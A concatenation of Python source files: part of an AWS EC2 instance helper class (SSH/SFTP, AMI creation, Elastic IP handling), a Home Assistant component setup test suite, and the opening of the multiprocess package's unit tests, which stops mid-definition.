""" assert not src.startswith("s3://") assert dest.startswith("s3://") command = ["aws", "s3", "cp", src, dest] if public: command.extend(("--acl", "public-read")) self.run_command(" ".join(command)) def upload(self, content, dest): """Upload a file to the instance. Args: content (str): The content of the file. dest (str): The path on the instance to upload to. """ if self._sftp_client is None: self._connect_sftp() fo = io.StringIO(content) self._sftp_client.putfo(fo, dest) def save_image(self, name, reboot=True): """Create an AMI from the current state of this instance. Stops the instance in the process. Args: name (str): The name to give the AMI. reboot (bool): Whether to boot the instance after creating the AMI. If False, the instance will be left stopped. If omitted, True. """ self._log.debug("Stopping instance.") self.instance.stop() self._wait_until_state("stopped") self._log.debug("Starting image creation.") image = self.instance.create_image(Name=name) self._log.debug("Waiting for image creation.") image.wait_until_exists() for i in range(self.IMAGE_POLL_MAX): self._log.debug("Doing poll #%d out of %d." % (i+1, self.IMAGE_POLL_MAX)) image.reload() if image.state == "available": break time.sleep(self.IMAGE_POLL_INTERVAL) else: raise RuntimeError("AMI did not become available within time " "constraints.") if reboot: self._log.debug("Starting instance.") self.instance.start() self._wait_until_state("running") self._log.debug("Done.") def cleanup(self): """Terminate the instance and clean up all associated resources. 
""" try: if self._should_stop_monitoring is not None: self._should_stop_monitoring.set() if self._sftp_client is not None: self._log.debug("Closing SFTP client.") self._sftp_client.close() self._sftp_client = None if self._ssh_client is not None: self._log.debug("Closing SSH client.") self._ssh_client.close() self._ssh_client = None if self.instance is not None: self._log.debug("Terminating instance.") self.instance.terminate() self._log.debug("Waiting for instance to terminate.") self.instance.wait_until_terminated() self.instance = None if self.elastic_ip is not None: self._log.debug("Releasing Elastic IP") try: self.release_elastic_ip(self.elastic_ip.allocation_id) except: pass self._log.debug("Done.") except: MESSAGE = "An error occured during cleanup. Some EC2 resources " \ "may remain. Delete them manually." print("=" * len(MESSAGE)) print(MESSAGE) print("=" * len(MESSAGE)) raise sys.exc_info()[1] def _exists(self): self._log.debug("Listing instances.") name_filter = { "Name": "tag:Name", "Values": [self._name] } state_filter = { "Name": "instance-state-name", "Values": ["running"] } filters = [name_filter, state_filter] instances = list( resources.ec2_resource.instances.filter(Filters=filters)) if len(instances) > 0: self._log.info("An existing instance with the same name was found.") self.instance = instances[0] name = self._name + "_instance_profile" self._instance_profile = \ resources.iam_resource.InstanceProfile(name) return True self._log.info("No existing instance with the same name was found.") return False def allocate_elastic_ip(self): """ Allocates an Elastic IP address that can be associated with an instance. By using an Elastic IP address, you can keep the public IP address constant even when you change the associated instance. :return: The newly created Elastic IP object. By default, the address is not associated with any instance. 
""" try: response = ec2.meta.client.allocate_address(Domain='vpc') elastic_ip = ec2.VpcAddress(response['AllocationId']) self._log.debug("Allocated Elastic IP %s.", elastic_ip.public_ip) except ClientError: self._log.debug("Couldn't allocate Elastic IP.") raise else: return elastic_ip def associate_elastic_ip(self, allocation_id, instance_id): """ Associates an Elastic IP address with an instance. When this association is created, the Elastic IP's public IP address is immediately used as the public IP address of the associated instance. :param allocation_id: The allocation ID assigned to the Elastic IP when it was created. :param instance_id: The ID of the instance to associate with the Elastic IP. :return: The Elastic IP object. """ try: elastic_ip = ec2.VpcAddress(allocation_id) elastic_ip.associate(InstanceId=instance_id) self._log.debug("Associated Elastic IP %s with instance %s, got association ID %s", elastic_ip.public_ip, instance_id, elastic_ip.association_id) except ClientError: self._log.debug( "Couldn't associate Elastic IP %s with instance %s.", allocation_id, instance_id) raise return elastic_ip def disassociate_elastic_ip(self, allocation_id): """ Removes an association between an Elastic IP address and an instance. When the association is removed, the instance is assigned a new public IP address. :param allocation_id: The allocation ID assigned to the Elastic IP address when it was created. """ try: elastic_ip = ec2.VpcAddress(allocation_id) elastic_ip.association.delete() self._log.debug( "Disassociated Elastic IP %s from its instance.", elastic_ip.public_ip) except ClientError: self._log.debug( "Couldn't disassociate Elastic IP %s from its instance.", allocation_id) raise def release_elastic_ip(self, allocation_id): """ Releases an Elastic IP address. After the Elastic IP address is released, it can no longer be used. :param allocation_id: The allocation ID assigned to the Elastic IP address when it was created. 
""" try: elastic_ip = ec2.VpcAddress(allocation_id) elastic_ip.release() self._log.debug("Released Elastic IP address %s.", allocation_id) except ClientError: self._log.debug( "Couldn't release Elastic IP address %s.", allocation_id) raise def _start_and_wait(self): self._log.debug("Starting a new instance.") tag = { "Key": "Name", "Value": self._name } tag_spec = { "ResourceType": "instance", "Tags": [tag] } block_dev = { "DeviceName": "/dev/xvda", "Ebs": { "DeleteOnTermination": True, "VolumeSize": self._disk_size, } } # block_dev2 = { # "DeviceName": "/dev/sda1", # "Ebs": { # "DeleteOnTermination": True, # "VolumeSize": self._disk_size, # } # } create_args = { "BlockDeviceMappings": [block_dev], # "BlockDeviceMappings": [block_dev, block_dev2], "KeyName": self.KEY_PAIR_NAME, "ImageId": self._ami_id, "InstanceType": self._type, "MinCount": 1, "MaxCount": 1, "SecurityGroups": [self.SECURITY_GROUP_NAME], "IamInstanceProfile": {"Name": self.INSTANCE_PROFILE_NAME}, "TagSpecifications": [tag_spec] } if self._spot_bid is not None: create_args["InstanceMarketOptions"] = { "MarketType": "spot", "SpotOptions": { "MaxPrice": self._spot_bid, "SpotInstanceType": "one-time", "InstanceInterruptionBehavior": "terminate" } } instances = resources.ec2_resource.create_instances(**create_args) self.instance = instances[0] addresses = ec2.meta.client.describe_addresses() self.elastic_ip = self.allocate_elastic_ip() self._log.debug(f"Allocated static Elastic IP address: {self.elastic_ip.public_ip}.") self._log.debug("Waiting for instance to enter running state.") # self._wait_until_state("running") self.instance.wait_until_running() self._log.debug("Fetching instance metadata.") # Reloads metadata about the instance. In particular, retreives its # public_ip_address. 
self.instance.load() self._log.debug("Associating elastic IP.") self.associate_elastic_ip(self.elastic_ip.allocation_id, self.instance.instance_id) self._log.debug("Done.") def _wait_until_state(self, state): """Wait until this instance enters a given state. Args: state (str): The name of the state. Raises: RuntimeError: The timeout is reached before the instance enters the given state. """ start = time.time() while time.time() - start < self._RUNNING_POLL_TIMEOUT: self.instance.reload() if self.instance.state["Name"] == state: break time.sleep(self._RUNNING_POLL_INTERVAL) else: raise RuntimeError("Timed out waiting for instance to enter " "\"%s\" state." % state) def _start_termination_monitoring(self): def is_marked_for_termination(): self._log.debug("Checking whether marked for termination.") command = "curl -s -o /dev/null -w \"%%{http_code}\" %s" \ % INSTANCE_ACTION_URL status, out, _ = self.run_command(command, False) return out != "404" def monitor_forever(): self._log.debug("Beginning termination monitoring.") while not self._should_stop_monitoring.is_set(): if is_marked_for_termination(): raise RuntimeError("%s is marked for termination by the " "AWS spot service!" % self) time.sleep(TERMINATION_MONITORING_INTERVAL) self._should_stop_monitoring = threading.Event() thread_name = "%s Monitor" % self thread = threading.Thread(target=monitor_forever, name=thread_name) thread.start() def _connect_ssh(self, timeout=3, attempts=35): self._log.debug("Configuring.") with open(os.path.expanduser(self.PRIVATE_KEY_PATH), "r") as f: key = paramiko.RSAKey.from_private_key(f) self._ssh_client = paramiko.SSHClient() self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) authentication_failures = 0 for i in range(attempts): try: self._log.debug("Making connection attempt #%d out of %d." 
% (i+1, attempts)) # self._log.debug(f"IP ADDRESS TO CONNECT TO: {self.instance.public_ip()}") self._ssh_client.connect( hostname=self.elastic_ip.public_ip, username=self._username, pkey=key, timeout=timeout, # allow_agent=False and look_for_keys=False ensure that # Paramiko doesn't go looking for other keys. allow_agent=False, look_for_keys=False ) self._ssh_client.get_transport().window_size = 2147483647 self._ssh_client.get_transport().set_keepalive(SSH_KEEPALIVE) except socket.timeout: self._log.debug("Connection attempt timed out after %ds." % timeout) pass except paramiko.ssh_exception.NoValidConnectionsError: self._log.debug("Connection attempt failed. Sleeping for %ds." % timeout) time.sleep(timeout) pass except paramiko.ssh_exception.AuthenticationException: # If we attempt to connect while systemd happens to be starting # up, then our request will be purposely blocked. Try again, # but not too many times, since there may be an actual # authentication issue. authentication_failures += 1 if authentication_failures <= self._AUTHENTICATION_FAILURES: time.sleep(timeout) pass else: raise except Exception as exc: print(exc) else: break else: pass # FIXME def _connect_sftp(self): if self._ssh_client is None: self._connect_ssh() self._sftp_client = self._ssh_client.open_sftp()
# ---- concatenated file boundary: test_setup.py ----
"""Test component/platform setup.""" # pylint: disable=protected-access import asyncio import logging import os import threading from unittest import mock import voluptuous as vol from homeassistant import setup import homeassistant.config as config_util from homeassistant.const import EVENT_COMPONENT_LOADED, EVENT_HOMEASSISTANT_START from homeassistant.core import callback from homeassistant.helpers import discovery from homeassistant.helpers.config_validation import ( PLATFORM_SCHEMA, PLATFORM_SCHEMA_BASE, ) import homeassistant.util.dt as dt_util from tests.common import ( MockModule, MockPlatform, assert_setup_component, get_test_config_dir, get_test_home_assistant, mock_entity_platform, mock_integration, ) ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE) _LOGGER = logging.getLogger(__name__) class TestSetup: """Test the bootstrap utils.""" hass = None backup_cache = None # pylint: disable=invalid-name, no-self-use def setup_method(self, method): """Set up the test.""" self.hass = get_test_home_assistant() def teardown_method(self, method): """Clean up.""" self.hass.stop() def test_validate_component_config(self): """Test validating component configuration.""" config_schema = vol.Schema({"comp_conf": {"hello": str}}, required=True) mock_integration( self.hass, MockModule("comp_conf", config_schema=config_schema) ) with assert_setup_component(0): assert not setup.setup_component(self.hass, "comp_conf", {}) self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(0): assert not setup.setup_component( self.hass, "comp_conf", {"comp_conf": None} ) self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(0): assert not setup.setup_component(self.hass, "comp_conf", {"comp_conf": {}}) self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(0): assert not setup.setup_component( self.hass, "comp_conf", {"comp_conf": {"hello": "world", "invalid": "extra"}}, ) 
self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(1): assert setup.setup_component( self.hass, "comp_conf", {"comp_conf": {"hello": "world"}} ) def test_validate_platform_config(self, caplog): """Test validating platform configuration.""" platform_schema = PLATFORM_SCHEMA.extend({"hello": str}) platform_schema_base = PLATFORM_SCHEMA_BASE.extend({}) mock_integration( self.hass, MockModule("platform_conf", platform_schema_base=platform_schema_base), ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform(platform_schema=platform_schema), ) with assert_setup_component(0): assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": {"platform": "not_existing", "hello": "world"}}, ) self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("platform_conf") with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": {"platform": "whatever", "hello": "world"}}, ) self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("platform_conf") with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": [{"platform": "whatever", "hello": "world"}]}, ) self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("platform_conf") # Any falsey platform config will be ignored (None, {}, etc) with assert_setup_component(0) as config: assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": None} ) assert "platform_conf" in self.hass.config.components assert not config["platform_conf"] # empty assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": {}} ) assert "platform_conf" in self.hass.config.components assert not config["platform_conf"] # empty def test_validate_platform_config_2(self, caplog): """Test component PLATFORM_SCHEMA_BASE prio over PLATFORM_SCHEMA.""" platform_schema = PLATFORM_SCHEMA.extend({"hello": str}) platform_schema_base = 
PLATFORM_SCHEMA_BASE.extend({"hello": "world"}) mock_integration( self.hass, MockModule( "platform_conf", platform_schema=platform_schema, platform_schema_base=platform_schema_base, ), ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform("whatever", platform_schema=platform_schema), ) with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", { # pass "platform_conf": {"platform": "whatever", "hello": "world"}, # fail: key hello violates component platform_schema_base "platform_conf 2": {"platform": "whatever", "hello": "there"}, }, ) def test_validate_platform_config_3(self, caplog): """Test fallback to component PLATFORM_SCHEMA.""" component_schema = PLATFORM_SCHEMA_BASE.extend({"hello": str}) platform_schema = PLATFORM_SCHEMA.extend({"cheers": str, "hello": "world"}) mock_integration( self.hass, MockModule("platform_conf", platform_schema=component_schema) ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform("whatever", platform_schema=platform_schema), ) with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", { # pass "platform_conf": {"platform": "whatever", "hello": "world"}, # fail: key hello violates component platform_schema "platform_conf 2": {"platform": "whatever", "hello": "there"}, }, ) def test_validate_platform_config_4(self): """Test entity_namespace in PLATFORM_SCHEMA.""" component_schema = PLATFORM_SCHEMA_BASE platform_schema = PLATFORM_SCHEMA mock_integration( self.hass, MockModule("platform_conf", platform_schema_base=component_schema), ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform(platform_schema=platform_schema), ) with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", { "platform_conf": { # pass: entity_namespace accepted by PLATFORM_SCHEMA "platform": "whatever", "entity_namespace": "yummy", } }, ) self.hass.data.pop(setup.DATA_SETUP) 
self.hass.config.components.remove("platform_conf") def test_component_not_found(self): """setup_component should not crash if component doesn't exist.""" assert setup.setup_component(self.hass, "non_existing", {}) is False def test_component_not_double_initialized(self): """Test we do not set up a component twice.""" mock_setup = mock.MagicMock(return_value=True) mock_integration(self.hass, MockModule("comp", setup=mock_setup)) assert setup.setup_component(self.hass, "comp", {}) assert mock_setup.called mock_setup.reset_mock() assert setup.setup_component(self.hass, "comp", {}) assert not mock_setup.called @mock.patch("homeassistant.util.package.install_package", return_value=False) def test_component_not_installed_if_requirement_fails(self, mock_install): """Component setup should fail if requirement can't install.""" self.hass.config.skip_pip = False mock_integration(self.hass, MockModule("comp", requirements=["package==0.0.1"])) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components def test_component_not_setup_twice_if_loaded_during_other_setup(self): """Test component setup while waiting for lock is not set up twice.""" result = [] @asyncio.coroutine def async_setup(hass, config): """Tracking Setup.""" result.append(1) mock_integration(self.hass, MockModule("comp", async_setup=async_setup)) def setup_component(): """Set up the component.""" setup.setup_component(self.hass, "comp", {}) thread = threading.Thread(target=setup_component) thread.start() setup.setup_component(self.hass, "comp", {}) thread.join() assert len(result) == 1 def test_component_not_setup_missing_dependencies(self): """Test we do not set up a component if not all dependencies loaded.""" deps = ["maybe_existing"] mock_integration(self.hass, MockModule("comp", dependencies=deps)) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components self.hass.data.pop(setup.DATA_SETUP) 
mock_integration(self.hass, MockModule("comp2", dependencies=deps)) mock_integration(self.hass, MockModule("maybe_existing")) assert setup.setup_component(self.hass, "comp2", {}) def test_component_failing_setup(self): """Test component that fails setup.""" mock_integration( self.hass, MockModule("comp", setup=lambda hass, config: False) ) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components def test_component_exception_setup(self): """Test component that raises exception during setup.""" def exception_setup(hass, config): """Raise exception.""" raise Exception("fail!") mock_integration(self.hass, MockModule("comp", setup=exception_setup)) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components def test_component_setup_with_validation_and_dependency(self): """Test all config is passed to dependencies.""" def config_check_setup(hass, config): """Test that config is passed in.""" if config.get("comp_a", {}).get("valid", False): return True raise Exception("Config not passed in: {}".format(config)) platform = MockPlatform() mock_integration(self.hass, MockModule("comp_a", setup=config_check_setup)) mock_integration( self.hass, MockModule("platform_a", setup=config_check_setup, dependencies=["comp_a"]), ) mock_entity_platform(self.hass, "switch.platform_a", platform) setup.setup_component( self.hass, "switch", {"comp_a": {"valid": True}, "switch": {"platform": "platform_a"}}, ) assert "comp_a" in self.hass.config.components def test_platform_specific_config_validation(self): """Test platform that specifies config.""" platform_schema = PLATFORM_SCHEMA.extend( {"valid": True}, extra=vol.PREVENT_EXTRA ) mock_setup = mock.MagicMock(spec_set=True) mock_entity_platform( self.hass, "switch.platform_a", MockPlatform(platform_schema=platform_schema, setup_platform=mock_setup), ) with assert_setup_component(0, "switch"): assert setup.setup_component( self.hass, "switch", 
{"switch": {"platform": "platform_a", "invalid": True}}, ) assert mock_setup.call_count == 0 self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("switch") with assert_setup_component(0): assert setup.setup_component( self.hass, "switch", { "switch": { "platform": "platform_a", "valid": True, "invalid_extra": True, } }, ) assert mock_setup.call_count == 0 self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("switch") with assert_setup_component(1, "switch"): assert setup.setup_component( self.hass, "switch", {"switch": {"platform": "platform_a", "valid": True}}, ) assert mock_setup.call_count == 1 def test_disable_component_if_invalid_return(self): """Test disabling component if invalid return.""" mock_integration( self.hass, MockModule("disabled_component", setup=lambda hass, config: None) ) assert not setup.setup_component(self.hass, "disabled_component", {}) assert "disabled_component" not in self.hass.config.components self.hass.data.pop(setup.DATA_SETUP) mock_integration( self.hass, MockModule("disabled_component", setup=lambda hass, config: False), ) assert not setup.setup_component(self.hass, "disabled_component", {}) assert "disabled_component" not in self.hass.config.components self.hass.data.pop(setup.DATA_SETUP) mock_integration( self.hass, MockModule("disabled_component", setup=lambda hass, config: True) ) assert setup.setup_component(self.hass, "disabled_component", {}) assert "disabled_component" in self.hass.config.components def test_all_work_done_before_start(self): """Test all init work done till start.""" call_order = [] def component1_setup(hass, config): """Set up mock component.""" discovery.discover(hass, "test_component2", {}, "test_component2", {}) discovery.discover(hass, "test_component3", {}, "test_component3", {}) return True def component_track_setup(hass, config): """Set up mock component.""" call_order.append(1) return True mock_integration( self.hass, MockModule("test_component1", 
setup=component1_setup) ) mock_integration( self.hass, MockModule("test_component2", setup=component_track_setup) ) mock_integration( self.hass, MockModule("test_component3", setup=component_track_setup) ) @callback def track_start(event): """Track start event.""" call_order.append(2) self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start) self.hass.add_job(setup.async_setup_component(self.hass, "test_component1", {})) self.hass.block_till_done() self.hass.start() assert call_order == [1, 1, 2] @asyncio.coroutine def test_component_cannot_depend_config(hass): """Test config is not allowed to be a dependency.""" result = yield from setup._async_process_dependencies( hass, None, "test", ["config"] ) assert not result @asyncio.coroutine def test_component_warn_slow_setup(hass): """Warn we log when a component setup takes a long time.""" mock_integration(hass, MockModule("test_component1")) with mock.patch.object(hass.loop, "call_later", mock.MagicMock()) as mock_call: result = yield from setup.async_setup_component(hass, "test_component1", {}) assert result assert mock_call.called assert len(mock_call.mock_calls) == 3 timeout, logger_method = mock_call.mock_calls[0][1][:2] assert timeout == setup.SLOW_SETUP_WARNING assert logger_method == setup._LOGGER.warning assert mock_call().cancel.called @asyncio.coroutine def test_platform_no_warn_slow(hass): """Do not warn for long entity setup time.""" mock_integration( hass, MockModule("test_component1", platform_schema=PLATFORM_SCHEMA) ) with mock.patch.object(hass.loop, "call_later", mock.MagicMock()) as mock_call: result = yield from setup.async_setup_component(hass, "test_component1", {}) assert result assert not mock_call.called async def test_when_setup_already_loaded(hass): """Test when setup.""" calls = [] async def mock_callback(hass, component): """Mock callback.""" calls.append(component) setup.async_when_setup(hass, "test", mock_callback) await hass.async_block_till_done() assert calls == [] 
    # Mark "test" as loaded and fire the loaded event: callback must run once.
    hass.config.components.add("test")
    hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"})
    await hass.async_block_till_done()
    assert calls == ["test"]

    # Event listener should be gone
    hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"})
    await hass.async_block_till_done()
    assert calls == ["test"]

    # Should be called right away
    setup.async_when_setup(hass, "test", mock_callback)
    await hass.async_block_till_done()
    assert calls == ["test", "test"]


async def test_setup_import_blows_up(hass):
    """Test that we handle it correctly when importing integration blows up."""
    # Importing the integration raises ValueError; setup must report failure
    # rather than propagate the exception to the caller.
    with mock.patch(
        "homeassistant.loader.Integration.get_component", side_effect=ValueError
    ):
        assert not await setup.async_setup_component(hass, "sun", {})
# ---- concatenated file boundary: __init__.py ----
# # Unit tests for the multiprocess package # import unittest import queue as pyqueue import contextlib import time import io import itertools import sys import os import gc import errno import signal import array import socket import random import logging import struct import operator import weakref from test import support import test.support.script_helper # Skip tests if _multiprocessing wasn't built. _multiprocessing = support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. support.import_module('multiprocess.synchronize') # import threading after _multiprocessing to raise a more relevant error # message: "No module named _multiprocessing". _multiprocessing is not compiled # without thread support. import threading import multiprocess.connection import multiprocess.dummy import multiprocess.heap import multiprocess.managers import multiprocess.pool import multiprocess.queues from multiprocess import util try: from multiprocess import reduction HAS_REDUCTION = reduction.HAVE_SEND_HANDLE except ImportError: HAS_REDUCTION = False try: from multiprocess.sharedctypes import Value, copy HAS_SHAREDCTYPES = True except ImportError: HAS_SHAREDCTYPES = False try: import msvcrt except ImportError: msvcrt = None # # # def latin(s): return s.encode('latin') def close_queue(queue): if isinstance(queue, multiprocess.queues.Queue): queue.close() queue.join_thread() # # Constants # LOG_LEVEL = util.SUBWARNING #LOG_LEVEL = logging.DEBUG DELTA = 0.1 CHECK_TIMINGS = False # making true makes tests take a lot longer # and can sometimes cause some non-serious # failures because some calls block a bit # longer than expected if CHECK_TIMINGS: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4 else: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1 HAVE_GETVALUE = not getattr(_multiprocessing, 'HAVE_BROKEN_SEM_GETVALUE', False) WIN32 = (sys.platform == "win32") from multiprocess.connection import wait def wait_for_handle(handle, timeout): if timeout is not 
None and timeout < 0.0: timeout = None return wait([handle], timeout) try: MAXFD = os.sysconf("SC_OPEN_MAX") except: MAXFD = 256 # To speed up tests when using the forkserver, we can preload these: PRELOAD = ['__main__', 'test_multiprocessing_forkserver'] # # Some tests require ctypes # try: from ctypes import Structure, c_int, c_double except ImportError: Structure = object c_int = c_double = None def check_enough_semaphores(): """Check that the system supports enough semaphores to run the test.""" # minimum number of semaphores available according to POSIX nsems_min = 256 try: nsems = os.sysconf("SC_SEM_NSEMS_MAX") except (AttributeError, ValueError): # sysconf not available or setting not available return if nsems == -1 or nsems >= nsems_min: return raise unittest.SkipTest("The OS doesn't support enough semaphores " "to run the test (required: %d)." % nsems_min) # # Creates a wrapper for a function which records the time it takes to finish # class TimingWrapper(object): def __init__(self, func): self.func = func self.elapsed = None def __call__(self, *args, **kwds): t = time.time() try: return self.func(*args, **kwds) finally: self.elapsed = time.time() - t # # Base class for test cases # class BaseTestCase(object): ALLOWED_TYPES = ('processes', 'manager', 'threads') def assertTimingAlmostEqual(self, a, b): if CHECK_TIMINGS: self.assertAlmostEqual(a, b, 1) def assertReturnsIfImplemented(self, value, func, *args): try: res = func(*args) except NotImplementedError: pass else: return self.assertEqual(value, res) # For the sanity of Windows users, rather than crashing or freezing in # multiple ways. 
def __reduce__(self, *args): raise NotImplementedError("shouldn't try to pickle a test case") __reduce_ex__ = __reduce__ # # Return the value of a semaphore # def get_value(self): try: return self.get_value() except AttributeError: try: return self._Semaphore__value except AttributeError: try: return self._value except AttributeError: raise NotImplementedError # # Testcases # class DummyCallable: def __call__(self, q, c): assert isinstance(c, DummyCallable) q.put(5) class _TestProcess(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') def test_current(self): if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) current = self.current_process() authkey = current.authkey self.assertTrue(current.is_alive()) self.assertTrue(not current.daemon) self.assertIsInstance(authkey, bytes) self.assertTrue(len(authkey) > 0) self.assertEqual(current.ident, os.getpid()) self.assertEqual(current.exitcode, None) def test_daemon_argument(self): if self.TYPE == "threads": self.skipTest('test not appropriate for {}'.format(self.TYPE)) # By default uses the current process's daemon flag. 
proc0 = self.Process(target=self._test) self.assertEqual(proc0.daemon, self.current_process().daemon) proc1 = self.Process(target=self._test, daemon=True) self.assertTrue(proc1.daemon) proc2 = self.Process(target=self._test, daemon=False) self.assertFalse(proc2.daemon) @classmethod def _test(cls, q, *args, **kwds): current = cls.current_process() q.put(args) q.put(kwds) q.put(current.name) if cls.TYPE != 'threads': q.put(bytes(current.authkey)) q.put(current.pid) def test_process(self): q = self.Queue(1) e = self.Event() args = (q, 1, 2) kwargs = {'hello':23, 'bye':2.54} name = 'SomeProcess' p = self.Process( target=self._test, args=args, kwargs=kwargs, name=name ) p.daemon = True current = self.current_process() if self.TYPE != 'threads': self.assertEqual(p.authkey, current.authkey) self.assertEqual(p.is_alive(), False) self.assertEqual(p.daemon, True) self.assertNotIn(p, self.active_children()) self.assertTrue(type(self.active_children()) is list) self.assertEqual(p.exitcode, None) p.start() self.assertEqual(p.exitcode, None) self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(q.get(), args[1:]) self.assertEqual(q.get(), kwargs) self.assertEqual(q.get(), p.name) if self.TYPE != 'threads': self.assertEqual(q.get(), current.authkey) self.assertEqual(q.get(), p.pid) p.join() self.assertEqual(p.exitcode, 0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) close_queue(q) @classmethod def _test_terminate(cls): time.sleep(100) def test_terminate(self): if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) p = self.Process(target=self._test_terminate) p.daemon = True p.start() self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(p.exitcode, None) join = TimingWrapper(p.join) self.assertEqual(join(0), None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), True) self.assertEqual(join(-1), 
None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), True) # XXX maybe terminating too soon causes the problems on Gentoo... time.sleep(1) p.terminate() if hasattr(signal, 'alarm'): # On the Gentoo buildbot waitpid() often seems to block forever. # We use alarm() to interrupt it if it blocks for too long. def handler(*args): raise RuntimeError('join took too long: %s' % p) old_handler = signal.signal(signal.SIGALRM, handler) try: signal.alarm(10) self.assertEqual(join(), None) finally: signal.alarm(0) signal.signal(signal.SIGALRM, old_handler) else: self.assertEqual(join(), None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) p.join() # XXX sometimes get p.exitcode == 0 on Windows ... #self.assertEqual(p.exitcode, -signal.SIGTERM) def test_cpu_count(self): try: cpus = multiprocess.cpu_count() except NotImplementedError: cpus = 1 self.assertTrue(type(cpus) is int) self.assertTrue(cpus >= 1) def test_active_children(self): self.assertEqual(type(self.active_children()), list) p = self.Process(target=time.sleep, args=(DELTA,)) self.assertNotIn(p, self.active_children()) p.daemon = True p.start() self.assertIn(p, self.active_children()) p.join() self.assertNotIn(p, self.active_children()) @classmethod def _test_recursion(cls, wconn, id): wconn.send(id) if len(id) < 2: for i in range(2): p = cls.Process( target=cls._test_recursion, args=(wconn, id+[i]) ) p.start() p.join() @unittest.skipIf(True, "fails with is_dill(obj, child=True)") def test_recursion(self): rconn, wconn = self.Pipe(duplex=False) self._test_recursion(wconn, []) time.sleep(DELTA) result = [] while rconn.poll(): result.append(rconn.recv()) expected = [ [], [0], [0, 0], [0, 1], [1], [1, 0], [1, 1] ] self.assertEqual(result, expected) @classmethod def _test_sentinel(cls, event): event.wait(10.0) def test_sentinel(self): if self.TYPE == "threads": self.skipTest('test not appropriate for 
{}'.format(self.TYPE)) event = self.Event() p = self.Process(target=self._test_sentinel, args=(event,)) with self.assertRaises(ValueError): p.sentinel p.start() self.addCleanup(p.join) sentinel = p.sentinel self.assertIsInstance(sentinel, int) self.assertFalse(wait_for_handle(sentinel, timeout=0.0)) event.set() p.join() self.assertTrue(wait_for_handle(sentinel, timeout=1)) def test_lose_target_ref(self): c = DummyCallable() wr = weakref.ref(c) q = self.Queue() p = self.Process(target=c, args=(q, c)) del c p.start() p.join() self.assertIs(wr(), None) self.assertEqual(q.get(), 5) close_queue(q) @classmethod def _test_error_on_stdio_flush(self, evt, break_std_streams={}): for stream_name, action in break_std_streams.items(): if action == 'close': stream = io.StringIO() stream.close() else: assert action == 'remove' stream = None setattr(sys, stream_name, None) evt.set() def test_error_on_stdio_flush_1(self): # Check that Process works with broken standard streams streams = [io.StringIO(), None] streams[0].close() for stream_name in ('stdout', 'stderr'): for stream in streams: old_stream = getattr(sys, stream_name) setattr(sys, stream_name, stream) try: evt = self.Event() proc = self.Process(target=self._test_error_on_stdio_flush, args=(evt,)) proc.start() proc.join() self.assertTrue(evt.is_set()) self.assertEqual(proc.exitcode, 0) finally: setattr(sys, stream_name, old_stream) def test_error_on_stdio_flush_2(self): # Same as test_error_on_stdio_flush_1(), but standard streams are # broken by the child process for stream_name in ('stdout', 'stderr'): for action in ('close', 'remove'): old_stream = getattr(sys, stream_name) try: evt = self.Event() proc = self.Process(target=self._test_error_on_stdio_flush, args=(evt, {stream_name: action})) proc.start() proc.join() self.assertTrue(evt.is_set()) self.assertEqual(proc.exitcode, 0) finally: setattr(sys, stream_name, old_stream) @classmethod def _sleep_and_set_event(self, evt, delay=0.0): time.sleep(delay) evt.set() def 
